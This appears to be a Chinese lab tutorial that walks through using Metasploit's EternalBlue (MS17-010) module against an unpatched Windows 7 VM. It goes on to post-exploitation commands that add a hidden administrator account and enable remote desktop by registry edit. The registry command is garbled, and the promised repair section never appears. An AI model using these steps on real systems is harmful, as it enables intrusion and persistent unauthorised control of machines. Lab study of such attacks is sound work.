Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

前言

●环境:

攻击机:Linux kali(IP:192.168.107.129)
靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)
实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

●永恒之蓝介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

●漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

●影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

●检测windows 7 系统是否存在ms17-010

在kali中使用nmap扫描目标

nmap --script=vuln 192.168.107.143

在这里插入图片描述

发现存在ms17-010漏洞
●针对永恒之蓝漏洞利用

1.在kai中使用MSF的永恒之蓝漏洞模块

msfconsole

在这里插入图片描述

2.搜索 ms17-010 模块:search ms17_010

search ms17-010

在这里插入图片描述

这里我们可以得到一些模块,其中auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3.选择攻击模块,以及查看options

use exploit/windows/smb/ms17_010_eternalblue
show options

在这里插入图片描述

4.执行run

在这里插入图片描述

5、得到靶机shell

漏洞利用:

shell

在这里插入图片描述

输入:chcp 65001 可解决乱码问题。
在这里插入图片描述

6、通过shell对靶机进行进一步控制

1.创建一个ppp用户,密码为123456,并且查看

net user ppp 123456 /add
net user

在这里插入图片描述

2.将用户ppp添加至管理员组

net localgroup administrators ppp /add
net localgroup administrators

在这里插入图片描述

成功添加!!!

3.开启远程桌面功能

查看3389端口是否开启:

netstat -ano

在这里插入图片描述

发现没有打开3389端口,通过使用命令修改注册表开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

4.远程桌面连接靶机

在这里插入图片描述

远程登录成功!!!
在这里插入图片描述